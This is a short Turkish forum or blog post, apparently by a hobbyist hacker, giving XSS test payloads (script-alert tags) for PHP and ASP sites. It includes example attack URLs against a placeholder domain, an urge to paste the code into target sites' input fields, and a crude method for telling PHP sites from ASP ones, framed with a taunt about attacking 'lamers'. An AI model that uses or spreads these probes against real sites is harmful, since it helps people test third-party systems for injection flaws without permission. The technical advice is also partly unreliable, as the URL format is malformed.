HEDEF SİTE PHP İSE ;
Kod:
< script>alert("XSS TEST")</script>
HEDEF SİTE ASP İSE ;
Kod:
">< script>alert("HUNTER.")</script>
PHP İÇİN MESELA SÖYLE OLACAK
http://www.lamer.com/arama.php?=< script>alert("XSS TEST")</script>
ASP İÇİN MESELA SOYLE OLACAK
http://www.lamer.com/arama.asp?=">< script>alert("XSS TEST")</script>
Yukarıdaki kodu siteye uyguladığınızda kutucuk içinde XSS TEST yazacaktır. Eğer kutucuk içinde XSS TEST yazmazsa sitede xss açığı yok demektir.
ÖNEMLİ NOT :
Sitenin php veya asp olduğunu şöyle anlayabilirsiniz
Örnek : https://lamer.com/index.php/
Eğer böyleyse sitemiz php'dir.
ASP siteyide söyle anlayabiliriz
ÖRNEK : https://lamer.com/index.asp/
Link böyleyse sitemiz ASP'dir.
Konumuz bu kadardı bol lamer s*kmeler xD
+ olarak sitedeki İnput'lara yapıştırın kodu genelde orda olur xss.
YanıtlaSil